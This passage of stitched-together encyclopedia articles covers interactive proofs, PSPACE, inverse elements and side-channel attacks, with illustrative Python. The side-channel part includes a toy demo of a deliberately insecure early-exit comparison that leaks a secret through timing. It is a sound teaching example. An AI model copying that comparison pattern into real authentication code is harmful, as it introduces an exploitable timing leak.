his partner are interrogated in separate rooms, it is considerably easier to detect a malicious prover trying to trick the verifier into accepting a string not in the language if there is another prover it can double-check with. In fact, this is so helpful that Babai, Fortnow, and Lund were able to show that MIP = NEXPTIME, the class of all problems solvable by a nondeterministic machine in exponential time, a very large class.[13] NEXPTIME contains PSPACE, and is believed to strictly contain PSPACE. Adding a constant number of additional provers beyond two does not enable recognition of any more languages. This result paved the way for the celebrated PCP theorem, which can be considered to be a "scaled-down" version of this theorem. MIP also has the helpful property that zero-knowledge proofs for every language in NP can be described without the assumption of one-way functions that IP must make. This has bearing on the design of provably unbreakable cryptographic algorithms.[12] Moreover, a MIP protocol can recognize all languages in IP in only a constant number of rounds, and if a third prover is added, it can recognize all languages in NEXPTIME in a constant number of rounds, showing again its power over IP. It is known that for any constant k, a MIP system with k provers and polynomially many rounds can be turned into an equivalent system with only 2 provers and a constant number of rounds.[14] While the designers of IP considered generalizations of Babai's interactive proof systems, others considered restrictions.
A very useful interactive proof system isPCP(f(n),g(n)), which is a restriction ofMAwhere Arthur can only usef(n) random bits and can only examineg(n) bits of the proof certificate sent by Merlin (essentially usingrandom access). There are a number of easy-to-prove results about variousPCPclasses.⁠PCP(0,poly){\displaystyle {\mathsf {PCP}}(0,{\mathsf {poly}})}⁠, the class of polynomial-time machines with no randomness but access to a certificate, is justNP.⁠PCP(poly,0){\displaystyle {\mathsf {PCP}}({\mathsf {poly}},0)}⁠, the class of polynomial-time machines with access to polynomially many random bits isco-RP. Arora and Safra's first major result was that⁠PCP(log,log)=NP{\displaystyle {\mathsf {PCP}}(\log ,\log )={\mathsf {NP}}}⁠; put another way, if the verifier in theNPprotocol is constrained to choose only⁠O(log⁡n){\displaystyle O(\log n)}⁠bits of the proof certificate to look at, this won't make any difference as long as it has⁠O(log⁡n){\displaystyle O(\log n)}⁠random bits to use.[15] Furthermore, thePCP theoremasserts that the number of proof accesses can be brought all the way down to a constant. That is,⁠NP=PCP(log,O(1)){\displaystyle {\mathsf {NP}}={\mathsf {PCP}}(\log ,O(1))}⁠.[16]They used this valuable characterization ofNPto prove thatapproximation algorithmsdo not exist for the optimization versions of certainNP-completeproblems unlessP = NP. Such problems are now studied in the field known ashardness of approximation.
https://en.wikipedia.org/wiki/Interactive_proof_system
In computational complexity theory, PSPACE is the set of all decision problems that can be solved by a Turing machine using a polynomial amount of space. If we denote by SPACE(f(n)) the set of all problems that can be solved by Turing machines using O(f(n)) space for some function f of the input size n, then we can define PSPACE formally as[1] PSPACE = ⋃_{k ∈ N} SPACE(n^k). It turns out that allowing the Turing machine to be nondeterministic does not add any extra power. Because of Savitch's theorem,[2] NPSPACE is equivalent to PSPACE, essentially because a deterministic Turing machine can simulate a nondeterministic Turing machine without needing much more space (even though it may use much more time).[3] Also, the complements of all problems in PSPACE are also in PSPACE, meaning that co-PSPACE = PSPACE.[4] The following relations are known between PSPACE and the complexity classes NL, P, NP, PH, EXPTIME and EXPSPACE (we use here ⊂ to denote strict containment, meaning a proper subset, whereas ⊆ includes the possibility that the two sets are the same):
NL ⊆ P ⊆ NP ⊆ PH ⊆ PSPACE
PSPACE ⊆ EXPTIME ⊆ EXPSPACE
NL ⊂ PSPACE ⊂ EXPSPACE
From the third line, it follows that both in the first and in the second line, at least one of the set containments must be strict, but it is not known which. It is widely suspected that all are strict. The containments in the third line are both known to be strict. The first follows from direct diagonalization (the space hierarchy theorem, NL ⊂ NPSPACE) and the fact that PSPACE = NPSPACE via Savitch's theorem. The second follows simply from the space hierarchy theorem. The hardest problems in PSPACE are the PSPACE-complete problems. See PSPACE-complete for examples of problems that are suspected to be in PSPACE but not in NP. The class PSPACE is closed under the operations union, complementation, and Kleene star. An alternative characterization of PSPACE is the set of problems decidable by an alternating Turing machine in polynomial time, sometimes called APTIME or just AP.[5] A logical characterization of PSPACE from descriptive complexity theory is that it is the set of problems expressible in second-order logic with the addition of a transitive closure operator. A full transitive closure is not needed; a commutative transitive closure and even weaker forms suffice. It is the addition of this operator that (possibly) distinguishes PSPACE from PH. A major result of complexity theory is that PSPACE can be characterized as all the languages recognizable by a particular interactive proof system, the one defining the class IP. In this system, there is an all-powerful prover trying to convince a randomized polynomial-time verifier that a string is in the language. It should be able to convince the verifier with high probability if the string is in the language, but should not be able to convince it except with low probability if the string is not in the language. PSPACE can also be characterized as the quantum complexity class QIP.[6] PSPACE is also equal to P_CTC, problems solvable by classical computers using closed timelike curves,[7] as well as to BQP_CTC, problems solvable by quantum computers using closed timelike curves.[8] A language B is PSPACE-complete if it is in PSPACE and it is PSPACE-hard, which means that A ≤_P B for all A ∈ PSPACE, where A ≤_P B means that there is a polynomial-time many-one reduction from A to B. PSPACE-complete problems are of great importance to studying PSPACE problems because they represent the most difficult problems in PSPACE.
Finding a simple solution to a PSPACE-complete problem would mean we have a simple solution to all other problems in PSPACE because all PSPACE problems could be reduced to a PSPACE-complete problem.[9] An example of a PSPACE-complete problem is thequantified Boolean formula problem(usually abbreviated toQBForTQBF; theTstands for "true").[9]
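The reason TQBF sits naturally in PSPACE is that a fully quantified formula can be evaluated by recursing over the quantifier prefix while reusing the space of the two branches. The Python sketch below (illustrative, with a toy CNF encoding) does exactly that: its recursion depth, and hence its memory use, is bounded by the number of variables, even though its running time is exponential.

```python
def eval_qbf(prefix, clauses, assignment=None):
    """Evaluate a fully quantified Boolean formula in CNF.
    prefix: list of ('forall' | 'exists', variable) pairs, outermost first.
    clauses: list of clauses; a literal +i means variable i, -i means its negation.
    The recursion depth is at most the number of variables, so the space used
    is polynomial in the input size, although the running time is exponential."""
    assignment = dict(assignment or {})
    if not prefix:                       # all variables bound: just check the CNF
        return all(any(assignment[abs(l)] == (l > 0) for l in c) for c in clauses)
    (q, v), rest = prefix[0], prefix[1:]
    branches = (eval_qbf(rest, clauses, {**assignment, v: val}) for val in (False, True))
    return all(branches) if q == "forall" else any(branches)

# forall x1 exists x2 : (x1 or x2) and (not x1 or not x2)   -- true: take x2 = not x1
print(eval_qbf([("forall", 1), ("exists", 2)], [[1, 2], [-1, -2]]))   # True
# exists x1 forall x2 : (x1 or x2) and (not x1 or not x2)   -- false
print(eval_qbf([("exists", 1), ("forall", 2)], [[1, 2], [-1, -2]]))   # False
```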
https://en.wikipedia.org/wiki/PSPACE
In mathematics, the concept of an inverse element generalises the concepts of opposite (−x) and reciprocal (1/x) of numbers. Given an operation denoted here ∗, and an identity element denoted e, if x ∗ y = e, one says that x is a left inverse of y, and that y is a right inverse of x. (An identity element is an element such that x ∗ e = x and e ∗ y = y for all x and y for which the left-hand sides are defined.[1]) When the operation ∗ is associative, if an element x has both a left inverse and a right inverse, then these two inverses are equal and unique; they are called the inverse element or simply the inverse. Often an adjective is added for specifying the operation, such as in additive inverse, multiplicative inverse, and functional inverse. In this case (associative operation), an invertible element is an element that has an inverse. In a ring, an invertible element, also called a unit, is an element that is invertible under multiplication (this is not ambiguous, as every element is invertible under addition). Inverses are commonly used in groups, where every element is invertible, and in rings, where invertible elements are also called units. They are also commonly used for operations that are not defined for all possible operands, such as inverse matrices and inverse functions. This has been generalized to category theory, where, by definition, an isomorphism is an invertible morphism. The word 'inverse' is derived from the Latin inversus, meaning 'turned upside down' or 'overturned'. This may take its origin from the case of fractions, where the (multiplicative) inverse is obtained by exchanging the numerator and the denominator (the inverse of x/y is y/x). The concepts of inverse element and invertible element are commonly defined for binary operations that are everywhere defined (that is, the operation is defined for any two elements of its domain). However, these concepts are also commonly used with partial operations, that is, operations that are not defined everywhere. Common examples are matrix multiplication, function composition and composition of morphisms in a category. It follows that the common definitions of associativity and identity element must be extended to partial operations; this is the object of the first subsections. In this section, X is a set (possibly a proper class) on which a partial operation (possibly total) is defined, which is denoted with ∗. A partial operation is associative if (x ∗ y) ∗ z = x ∗ (y ∗ z) for every x, y, z in X for which one of the members of the equality is defined; the equality means that the other member of the equality must also be defined. Examples of non-total associative operations are multiplication of matrices of arbitrary size, and function composition. Let ∗ be a possibly partial associative operation on a set X. An identity element, or simply an identity, is an element e such that x ∗ e = x and e ∗ y = y for every x and y for which the left-hand sides of the equalities are defined. If e and f are two identity elements such that e ∗ f is defined, then e = f. (This results immediately from the definition, by e = e ∗ f = f.) It follows that a total operation has at most one identity element, and if e and f are different identities, then e ∗ f is not defined. For example, in the case of matrix multiplication, there is one n×n identity matrix for every positive integer n, and two identity matrices of different size cannot be multiplied together.
Similarly, identity functions are identity elements for function composition, and the composition of the identity functions of two different sets is not defined. If x ∗ y = e, where e is an identity element, one says that x is a left inverse of y, and y is a right inverse of x. Left and right inverses do not always exist, even when the operation is total and associative. For example, addition is a total associative operation on nonnegative integers, which has 0 as additive identity, and 0 is the only element that has an additive inverse. This lack of inverses is the main motivation for extending the natural numbers into the integers. An element can have several left inverses and several right inverses, even when the operation is total and associative. For example, consider the functions from the integers to the integers. The doubling function x ↦ 2x has infinitely many left inverses under function composition, namely the functions that divide the even numbers by two and assign any value whatsoever to the odd numbers. Similarly, every function that maps n to either 2n or 2n + 1 is a right inverse of the function n ↦ ⌊n/2⌋, the floor function that maps n to n/2 or (n − 1)/2, depending on whether n is even or odd. More generally, a function has a left inverse for function composition if and only if it is injective, and it has a right inverse if and only if it is surjective. In category theory, right inverses are also called sections, and left inverses are called retractions. An element is invertible under an operation if it has a left inverse and a right inverse. In the common case where the operation is associative, the left and right inverse of an element are equal and unique. Indeed, if l and r are respectively a left inverse and a right inverse of x, then l = l ∗ (x ∗ r) = (l ∗ x) ∗ r = r. The inverse of an invertible element is its unique left or right inverse. If the operation is denoted as an addition, the inverse, or additive inverse, of an element x is denoted −x. Otherwise, the inverse of x is generally denoted x⁻¹, or, in the case of a commutative multiplication, 1/x. When there may be a confusion between several operations, the symbol of the operation may be added before the exponent, such as in x^{∗−1}. The notation f^{∘−1} is not commonly used for function composition, since 1/f can be used for the multiplicative inverse. If x and y are invertible, and x ∗ y is defined, then x ∗ y is invertible, and its inverse is y⁻¹x⁻¹. An invertible homomorphism is called an isomorphism. In category theory, an invertible morphism is also called an isomorphism. A group is a set with an associative operation that has an identity element, and for which every element has an inverse. Thus, the inverse is a function from the group to itself that may also be considered as an operation of arity one. It is also an involution, since the inverse of the inverse of an element is the element itself. A group may act on a set as transformations of this set.
In this case, the inverseg−1{\displaystyle g^{-1}}of a group elementg{\displaystyle g}defines a transformation that is the inverse of the transformation defined byg,{\displaystyle g,}that is, the transformation that "undoes" the transformation defined byg.{\displaystyle g.} For example, theRubik's cube grouprepresents the finite sequences of elementary moves. The inverse of such a sequence is obtained by applying the inverse of each move in the reverse order. Amonoidis a set with anassociative operationthat has anidentity element. Theinvertible elementsin a monoid form agroupunder monoid operation. Aringis a monoid for ring multiplication. In this case, the invertible elements are also calledunitsand form thegroup of unitsof the ring. If a monoid is notcommutative, there may exist non-invertible elements that have a left inverse or a right inverse (not both, as, otherwise, the element would be invertible). For example, the set of thefunctionsfrom a set to itself is a monoid underfunction composition. In this monoid, the invertible elements are thebijective functions; the elements that have left inverses are theinjective functions, and those that have right inverses are thesurjective functions. Given a monoid, one may want extend it by adding inverse to some elements. This is generally impossible for non-commutative monoids, but, in a commutative monoid, it is possible to add inverses to the elements that have thecancellation property(an elementxhas the cancellation property ifxy=xz{\displaystyle xy=xz}impliesy=z,{\displaystyle y=z,}andyx=zx{\displaystyle yx=zx}impliesy=z{\displaystyle y=z}).This extension of a monoid is allowed byGrothendieck groupconstruction. This is the method that is commonly used for constructingintegersfromnatural numbers,rational numbersfromintegersand, more generally, thefield of fractionsof anintegral domain, andlocalizationsofcommutative rings. Aringis analgebraic structurewith two operations,additionandmultiplication, which are denoted as the usual operations on numbers. Under addition, a ring is anabelian group, which means that addition iscommutativeandassociative; it has an identity, called theadditive identity, and denoted0; and every elementxhas an inverse, called itsadditive inverseand denoted−x. Because of commutativity, the concepts of left and right inverses are meaningless since they do not differ from inverses. Under multiplication, a ring is amonoid; this means that multiplication is associative and has an identity called themultiplicative identityand denoted1. Aninvertible elementfor multiplication is called aunit. The inverse ormultiplicative inverse(for avoiding confusion with additive inverses) of a unitxis denotedx−1,{\displaystyle x^{-1},}or, when the multiplication is commutative,1x.{\textstyle {\frac {1}{x}}.} The additive identity0is never a unit, except when the ring is thezero ring, which has0as its unique element. If0is the only non-unit, the ring is afieldif the multiplication is commutative, or adivision ringotherwise. In anoncommutative ring(that is, a ring whose multiplication is not commutative), a non-invertible element may have one or several left or right inverses. This is, for example, the case of thelinear functionsfrom aninfinite-dimensional vector spaceto itself. Acommutative ring(that is, a ring whose multiplication is commutative) may be extended by adding inverses to elements that are notzero divisors(that is, their product with a nonzero element cannot be0). 
This is the process of localization, which produces, in particular, the field of rational numbers from the ring of integers, and, more generally, the field of fractions of an integral domain. Localization is also used with zero divisors, but in this case the original ring is not a subring of the localization; instead, it is mapped non-injectively to the localization. Matrix multiplication is commonly defined for matrices over a field, and straightforwardly extended to matrices over rings, rngs and semirings. However, in this section, only matrices over a commutative ring are considered, because of the use of the concepts of rank and determinant. If A is an m×n matrix (that is, a matrix with m rows and n columns), and B is a p×q matrix, the product AB is defined if n = p, and only in this case. An identity matrix, that is, an identity element for matrix multiplication, is a square matrix (with the same number of rows and columns) whose entries on the main diagonal are all equal to 1, and all other entries are 0. An invertible matrix is an invertible element under matrix multiplication. A matrix over a commutative ring R is invertible if and only if its determinant is a unit in R (that is, is invertible in R). In this case, its inverse matrix can be computed with Cramer's rule. If R is a field, the determinant is invertible if and only if it is not zero. As the case of fields is more common, one often sees invertible matrices defined as matrices with a nonzero determinant, but this is incorrect over rings. In the case of integer matrices (that is, matrices with integer entries), an invertible matrix is a matrix that has an inverse that is also an integer matrix. Such a matrix is called a unimodular matrix to distinguish it from matrices that are invertible over the real numbers. A square integer matrix is unimodular if and only if its determinant is 1 or −1, since these two numbers are the only units in the ring of integers. A matrix has a left inverse if and only if its rank equals its number of columns. This left inverse is not unique, except for square matrices, where the left inverse equals the inverse matrix. Similarly, a right inverse exists if and only if the rank equals the number of rows; it is not unique in the case of a rectangular matrix, and equals the inverse matrix in the case of a square matrix. Composition is a partial operation that generalizes to homomorphisms of algebraic structures and morphisms of categories into operations that are also called composition, and that share many properties with function composition. In all cases, composition is associative. If f: X → Y and g: Y′ → Z, the composition g ∘ f is defined if and only if Y′ = Y or, in the function and homomorphism cases, Y ⊂ Y′. In the function and homomorphism cases, this means that the codomain of f equals or is included in the domain of g. In the morphism case, this means that the codomain of f equals the domain of g. There is an identity id_X: X → X for every object X (set, algebraic structure or object), which is also called the identity function in the function case. A function is invertible if and only if it is a bijection. An invertible homomorphism or morphism is called an isomorphism. A homomorphism of algebraic structures is an isomorphism if and only if it is a bijection. The inverse of a bijection is called an inverse function. In the other cases, one talks of inverse isomorphisms.
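Just as 1 and −1 are the only units of the ring of integers, the units of the ring of integers modulo n are exactly the residues coprime to n, and their inverses can be computed with the extended Euclidean algorithm. The Python sketch below (illustrative) lists the group of units of Z_12 and inverts one of its elements.

```python
def extended_gcd(a, b):
    """Return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x, y = extended_gcd(b, a % b)
    return g, y, x - (a // b) * y

def inverse_mod(a, n):
    """Multiplicative inverse of a in Z_n, defined exactly when a is a unit (gcd(a, n) = 1)."""
    g, x, _ = extended_gcd(a % n, n)
    if g != 1:
        raise ValueError(f"{a} is not invertible modulo {n}")
    return x % n

units_mod_12 = [a for a in range(1, 12) if extended_gcd(a, 12)[0] == 1]
print(units_mod_12)                                        # [1, 5, 7, 11]: the group of units of Z_12
print(inverse_mod(7, 12), (7 * inverse_mod(7, 12)) % 12)   # 7 1  (7 is its own inverse mod 12)
```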
A function has a left inverse or a right inverse if and only if it is injective or surjective, respectively. A homomorphism of algebraic structures that has a left inverse or a right inverse is respectively injective or surjective, but the converse is not true in some algebraic structures. For example, the converse is true for vector spaces but not for modules over a ring: a homomorphism of modules that has a left inverse or a right inverse is called, respectively, a split monomorphism or a split epimorphism. This terminology is also used for morphisms in any category. Let S be a unital magma, that is, a set with a binary operation ∗ and an identity element e ∈ S. If, for a, b ∈ S, we have a ∗ b = e, then a is called a left inverse of b and b is called a right inverse of a. If an element x is both a left inverse and a right inverse of y, then x is called a two-sided inverse, or simply an inverse, of y. An element with a two-sided inverse in S is called invertible in S. An element with an inverse element only on one side is left invertible or right invertible. Elements of a unital magma (S, ∗) may have multiple left, right or two-sided inverses. For example, in the magma given by the Cayley table the elements 2 and 3 each have two two-sided inverses. A unital magma in which all elements are invertible need not be a loop. For example, in the magma (S, ∗) given by the Cayley table every element has a unique two-sided inverse (namely itself), but (S, ∗) is not a loop because the Cayley table is not a Latin square. Similarly, a loop need not have two-sided inverses. For example, in the loop given by the Cayley table the only element with a two-sided inverse is the identity element 1. If the operation ∗ is associative, then if an element has both a left inverse and a right inverse, they are equal. In other words, in a monoid (an associative unital magma) every element has at most one inverse (as defined in this section). In a monoid, the set of invertible elements is a group, called the group of units of S, and denoted by U(S) or H1. The definition in the previous section generalizes the notion of inverse in a group relative to the notion of identity. It is also possible, albeit less obvious, to generalize the notion of an inverse by dropping the identity element but keeping associativity; that is, in a semigroup. In a semigroup S an element x is called (von Neumann) regular if there exists some element z in S such that xzx = x; z is sometimes called a pseudoinverse. An element y is called (simply) an inverse of x if xyx = x and y = yxy. Every regular element has at least one inverse: if x = xzx then it is easy to verify that y = zxz is an inverse of x as defined in this section. Another easy-to-prove fact: if y is an inverse of x then e = xy and f = yx are idempotents, that is, ee = e and ff = f. Thus, every pair of (mutually) inverse elements gives rise to two idempotents, and ex = xf = x, ye = fy = y, and e acts as a left identity on x, while f acts as a right identity, and the left/right roles are reversed for y.
This simple observation can be generalized usingGreen's relations: every idempotentein an arbitrary semigroup is a left identity forReand right identity forLe.[2]An intuitive description of this fact is that every pair of mutually inverse elements produces a local left identity, and respectively, a local right identity. In a monoid, the notion of inverse as defined in the previous section is strictly narrower than the definition given in this section. Only elements in the Green classH1have an inverse from the unital magma perspective, whereas for any idempotente, the elements ofHehave an inverse as defined in this section. Under this more general definition, inverses need not be unique (or exist) in an arbitrary semigroup or monoid. If all elements are regular, then the semigroup (or monoid) is called regular, and every element has at least one inverse. If every element has exactly one inverse as defined in this section, then the semigroup is called aninverse semigroup. Finally, an inverse semigroup with only one idempotent is a group. An inverse semigroup may have anabsorbing element0 because 000 = 0, whereas a group may not. Outside semigroup theory, a unique inverse as defined in this section is sometimes called aquasi-inverse. This is generally justified because in most applications (for example, all examples in this article) associativity holds, which makes this notion a generalization of the left/right inverse relative to an identity (seeGeneralized inverse). A natural generalization of the inverse semigroup is to define an (arbitrary) unary operation ° such that (a°)° =afor allainS; this endowsSwith a type ⟨2,1⟩ algebra. A semigroup endowed with such an operation is called aU-semigroup. Although it may seem thata° will be the inverse ofa, this is not necessarily the case. In order to obtain interesting notion(s), the unary operation must somehow interact with the semigroup operation. Two classes ofU-semigroups have been studied:[3] Clearly a group is both anI-semigroup and a *-semigroup. A class of semigroups important in semigroup theory arecompletely regular semigroups; these areI-semigroups in which one additionally hasaa° =a°a; in other words every element has commuting pseudoinversea°. There are few concrete examples of such semigroups however; most arecompletely simple semigroups. In contrast, a subclass of *-semigroups, the*-regular semigroups(in the sense of Drazin), yield one of best known examples of a (unique) pseudoinverse, theMoore–Penrose inverse. In this case however the involutiona* is not the pseudoinverse. Rather, the pseudoinverse ofxis the unique elementysuch thatxyx=x,yxy=y, (xy)* =xy, (yx)* =yx. Since *-regular semigroups generalize inverse semigroups, the unique element defined this way in a *-regular semigroup is called thegeneralized inverseorMoore–Penrose inverse. All examples in this section involve associative operators. The lower and upper adjoints in a (monotone)Galois connection,LandGare quasi-inverses of each other; that is,LGL=LandGLG=Gand one uniquely determines the other. They are not left or right inverses of each other however. Asquare matrixM{\displaystyle M}with entries in afieldK{\displaystyle K}is invertible (in the set of all square matrices of the same size, undermatrix multiplication) if and only if itsdeterminantis different from zero. If the determinant ofM{\displaystyle M}is zero, it is impossible for it to have a one-sided inverse; therefore a left inverse or right inverse implies the existence of the other one. 
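The four conditions characterizing the Moore–Penrose inverse are easy to verify numerically. The NumPy sketch below (illustrative) takes a singular square matrix, which therefore has no one-sided inverse at all, computes its pseudoinverse, and checks xyx = x, yxy = y, (xy)* = xy and (yx)* = yx.

```python
import numpy as np

x = np.array([[1.0, 2.0],
              [2.0, 4.0]])                  # singular, so no left or right inverse exists
y = np.linalg.pinv(x)                       # the Moore-Penrose inverse

checks = [
    np.allclose(x @ y @ x, x),              # x y x = x
    np.allclose(y @ x @ y, y),              # y x y = y
    np.allclose((x @ y).T, x @ y),          # (xy)* = xy
    np.allclose((y @ x).T, y @ x),          # (yx)* = yx
]
print(checks)                               # [True, True, True, True]
```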
See invertible matrix for more. More generally, a square matrix over a commutative ring R is invertible if and only if its determinant is invertible in R. Non-square matrices of full rank have several one-sided inverses:[4] a matrix A with linearly independent columns has (AᵀA)⁻¹Aᵀ as one of its left inverses, and a matrix with linearly independent rows has Aᵀ(AAᵀ)⁻¹ as one of its right inverses. The left inverse can be used to determine the least-squares solution of Ax = b, the formula used in regression, given by x = (AᵀA)⁻¹Aᵀb. No rank-deficient matrix has any (even one-sided) inverse. However, the Moore–Penrose inverse exists for all matrices, and coincides with the left or right (or true) inverse when it exists. As an example of one-sided matrix inverses, consider a wide matrix A of full rank with m < n. It has a right inverse A_right⁻¹ = Aᵀ(AAᵀ)⁻¹, which can be computed component by component from this formula. A left inverse does not exist, because AᵀA is an n×n matrix of rank only m, which is a singular matrix and cannot be inverted.
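A small numerical check of these formulas, with an example matrix chosen here purely for illustration:

```python
import numpy as np

A = np.array([[1.0, 0.0, 1.0],
              [0.0, 1.0, 2.0]])             # 2 x 3, full row rank (m < n)

A_right = A.T @ np.linalg.inv(A @ A.T)      # right inverse: A @ A_right = I_2
print(np.allclose(A @ A_right, np.eye(2)))  # True

b = np.array([1.0, 2.0])
x = A_right @ b                             # a solution of A x = b (the minimum-norm one)
print(np.allclose(A @ x, b))                # True

B = A.T                                     # 3 x 2, full column rank (m > n)
B_left = np.linalg.inv(B.T @ B) @ B.T       # left inverse: B_left @ B = I_2
print(np.allclose(B_left @ B, np.eye(2)))   # True
```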
https://en.wikipedia.org/wiki/Invertible_element#In_the_integers_mod_n
Incomputer security, aside-channel attackis any attack based on extra information that can be gathered because of the fundamental way acomputer protocoloralgorithmisimplemented, rather than flaws in the design of the protocol or algorithm itself (e.g. flaws found in acryptanalysisof acryptographic algorithm) or minor, but potentially devastating,mistakes or oversights in the implementation. (Cryptanalysis also includes searching for side-channel attacks.) Timing information, power consumption,electromagneticleaks, andsoundare examples of extra information which could be exploited to facilitate side-channel attacks. Some side-channel attacks require technical knowledge of the internal operation of the system, although others such asdifferential power analysisare effective asblack-boxattacks. The rise ofWeb 2.0applications andsoftware-as-a-servicehas also significantly raised the possibility of side-channel attacks on the web, even when transmissions between a web browser and server are encrypted (e.g. throughHTTPSorWiFiencryption), according to researchers fromMicrosoft ResearchandIndiana University.[1] Attempts to break a cryptosystem by deceiving or coercing people with legitimate access are not typically considered side-channel attacks: seesocial engineeringandrubber-hose cryptanalysis. General classes of side-channel attack include: In all cases, the underlying principle is that physical effects caused by the operation of acryptosystem(on the side) can provide useful extra information about secrets in the system, for example, thecryptographic key, partial state information, full or partialplaintextsand so forth. The term cryptophthora (secret degradation) is sometimes used to express the degradation of secret key material resulting from side-channel leakage. Acache side-channel attackworks by monitoring security critical operations such asAEST-table entry[2][3][4]or modular exponentiation or multiplication or memory accesses.[5]The attacker then is able to recover the secret key depending on the accesses made (or not made) by the victim, deducing the encryption key. Also, unlike some of the other side-channel attacks, this method does not create a fault in the ongoing cryptographic operation and is invisible to the victim. In 2017, twoCPUvulnerabilities (dubbedMeltdownandSpectre) were discovered, which can use a cache-based side channel to allow an attacker to leak memory contents of other processes and the operating system itself. Atiming attackwatches data movement into and out of theCPUor memory on the hardware running the cryptosystem or algorithm. Simply by observing variations in how long it takes to perform cryptographic operations, it might be possible to determine the entire secret key. Such attacks involve statistical analysis of timing measurements and have been demonstrated across networks.[6] Apower-analysisattack can provide even more detailed information by observing the power consumption of a hardware device such as CPU or cryptographic circuit. These attacks are roughly categorized into simple power analysis (SPA) and differential power analysis (DPA). One example is Collide+Power, which affects nearly all CPUs.[7][8][9]Other examples usemachine learningapproaches.[10] Fluctuations in current also generateradio waves, enabling attacks that analyze measurements of electromagnetic (EM) emanations. These attacks typically involve similar statistical techniques as power-analysis attacks. 
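The timing channel can be reproduced in miniature. The Python sketch below (a contrived illustration, with an artificial per-byte delay added so the effect is visible without collecting large numbers of measurements) compares a secret value against two guesses using an early-exit comparison; the guess sharing a longer correct prefix with the secret takes measurably longer to be rejected, which is exactly the information a timing attack accumulates statistically.

```python
import time

SECRET = b"hunter2hunter2hu"        # 16 bytes; a stand-in for a key or token

def insecure_check(guess: bytes) -> bool:
    """Early-exit comparison: running time grows with the length of the correct prefix."""
    if len(guess) != len(SECRET):
        return False
    for g, s in zip(guess, SECRET):
        if g != s:
            return False            # leaks where the first mismatch occurs
        time.sleep(1e-4)            # exaggerated per-byte work, so the leak is easy to see
    return True

def time_guess(guess: bytes, reps: int = 5) -> float:
    start = time.perf_counter()
    for _ in range(reps):
        insecure_check(guess)
    return time.perf_counter() - start

wrong_prefix = bytes([SECRET[0] ^ 1]) + SECRET[1:]   # wrong from the very first byte
right_prefix = SECRET[:8] + bytes(8)                 # first 8 bytes correct, rest wrong
print(time_guess(wrong_prefix) < time_guess(right_prefix))   # True: timing reveals the prefix
```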
A deep-learning-based side-channel attack[11][12][13] using power and EM information across multiple devices has been demonstrated with the potential to break the secret key of a different but identical device in as little as a single trace. Historical analogues to modern side-channel attacks are known. A recently declassified NSA document reveals that as far back as 1943, an engineer with Bell Telephone observed decipherable spikes on an oscilloscope associated with the decrypted output of a certain encrypting teletype.[14] According to former MI5 officer Peter Wright, the British Security Service analyzed emissions from French cipher equipment in the 1960s.[15] In the 1980s, Soviet eavesdroppers were suspected of having planted bugs inside IBM Selectric typewriters to monitor the electrical noise generated as the type ball rotated and pitched to strike the paper; the characteristics of those signals could determine which key was pressed.[16] Power consumption of devices causes heating, which is offset by cooling effects. Temperature changes create thermally induced mechanical stress. This stress can create low-level acoustic emissions from operating CPUs (about 10 kHz in some cases). Recent research by Shamir et al. has suggested that information about the operation of cryptosystems and algorithms can be obtained in this way as well. This is an acoustic cryptanalysis attack. If the surface of the CPU chip, or in some cases the CPU package, can be observed, infrared images can also provide information about the code being executed on the CPU, known as a thermal-imaging attack.[citation needed] Examples of optical side-channel attacks range from gleaning information from the hard disk activity indicator[17] to reading a small number of photons emitted by transistors as they change state.[18] Allocation-based side channels also exist and refer to the information that leaks from the allocation (as opposed to the use) of a resource such as network bandwidth to clients that are concurrently requesting the contended resource.[19] Because side-channel attacks rely on the relationship between information emitted (leaked) through a side channel and the secret data, countermeasures fall into two main categories: (1) eliminate or reduce the release of such information and (2) eliminate the relationship between the leaked information and the secret data, that is, make the leaked information unrelated, or rather uncorrelated, to the secret data, typically through some form of randomization of the ciphertext that transforms the data in a way that can be undone after the cryptographic operation (e.g., decryption) is completed. Under the first category, displays with special shielding to lessen electromagnetic emissions, reducing susceptibility to TEMPEST attacks, are now commercially available. Power line conditioning and filtering can help deter power-monitoring attacks, although such measures must be used cautiously, since even very small correlations can remain and compromise security. Physical enclosures can reduce the risk of surreptitious installation of microphones (to counter acoustic attacks) and other micro-monitoring devices (against CPU power-draw or thermal-imaging attacks). Another countermeasure (still in the first category) is to jam the emitted channel with noise. For instance, a random delay can be added to deter timing attacks, although adversaries can compensate for these delays by averaging multiple measurements (or, more generally, using more measurements in the analysis).
When the amount of noise in the side channel increases, the adversary needs to collect more measurements. Another countermeasure under the first category is to use security analysis software to identify certain classes of side-channel attacks that can be found during the design stages of the underlying hardware itself. Timing attacks and cache attacks are both identifiable through certain commercially available security analysis software platforms, which allow for testing to identify the attack vulnerability itself, as well as the effectiveness of the architectural change to circumvent the vulnerability. The most comprehensive method to employ this countermeasure is to create a Secure Development Lifecycle for hardware, which includes utilizing all available security analysis platforms at their respective stages of the hardware development lifecycle.[20] In the case of timing attacks against targets whose computation times are quantized into discrete clock cycle counts, an effective countermeasure is to design the software to be isochronous, that is, to run in an exactly constant amount of time, independently of secret values. This makes timing attacks impossible.[21] Such countermeasures can be difficult to implement in practice, since even individual instructions can have variable timing on some CPUs. One partial countermeasure against simple power attacks, but not differential power-analysis attacks, is to design the software so that it is "PC-secure" in the "program counter security model". In a PC-secure program, the execution path does not depend on secret values. In other words, all conditional branches depend only on public information. (This is a more restrictive condition than isochronous code, but a less restrictive condition than branch-free code.) Even though multiply operations draw more power than NOP on practically all CPUs, using a constant execution path prevents such operation-dependent power differences (differences in power from choosing one branch over another) from leaking any secret information.[21] On architectures where the instruction execution time is not data-dependent, a PC-secure program is also immune to timing attacks.[22][23] Another way in which code can be non-isochronous is that modern CPUs have a memory cache: accessing infrequently used information incurs a large timing penalty, revealing some information about the frequency of use of memory blocks. Cryptographic code designed to resist cache attacks attempts to use memory in only a predictable fashion (such as accessing only the inputs, outputs, and program data, and doing so according to a fixed pattern). For example, data-dependent table lookups must be avoided because the cache could reveal which part of the lookup table was accessed. Other partial countermeasures attempt to reduce the amount of information leaked from data-dependent power differences. Some operations use power that is correlated to the number of 1 bits in a secret value. Using a constant-weight code (such as using Fredkin gates or dual-rail encoding) can reduce the leakage of information about the Hamming weight of the secret value, although exploitable correlations are likely to remain unless the balancing is perfect. This "balanced design" can be approximated in software by manipulating both the data and its complement together.[21] Several "secure CPUs" have been built as asynchronous CPUs; they have no global timing reference.
